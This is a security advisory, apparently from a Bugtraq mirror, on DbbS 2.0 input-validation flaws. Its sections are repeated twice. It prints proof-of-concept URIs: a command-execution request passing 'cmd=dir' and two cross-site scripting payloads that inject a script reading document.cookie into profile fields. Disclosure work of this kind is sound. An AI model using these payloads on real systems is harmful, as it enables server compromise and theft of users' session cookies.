DbbS Multiple Input Validation Vulnerabilities
BID:17559
Info
DbbS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17559 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 17 2006 12:00AM |
| Updated: | Apr 18 2006 05:41PM |
| Credit: | rgod and yamcho are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
dbbs.sup.fr DbbS 2.0-alpha dbbs.sup.fr DbbS 2.0 |
| Not Vulnerable: | |
Discussion
DbbS Multiple Input Validation Vulnerabilities
DbbS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and command-execution vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based
authentication credentials, execute commands to compromise the server, and launch other attacks.
DbbS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and command-execution vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based
authentication credentials, execute commands to compromise the server, and launch other attacks.
Exploit / POC
DbbS Multiple Input Validation Vulnerabilities
These issues can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.site.com/DbbS/suntzu.php?cmd=dir
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script>
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>
These issues can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.site.com/DbbS/suntzu.php?cmd=dir
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script>
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>
Solution / Fix
DbbS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
DbbS Multiple Input Validation Vulnerabilities
References:
References: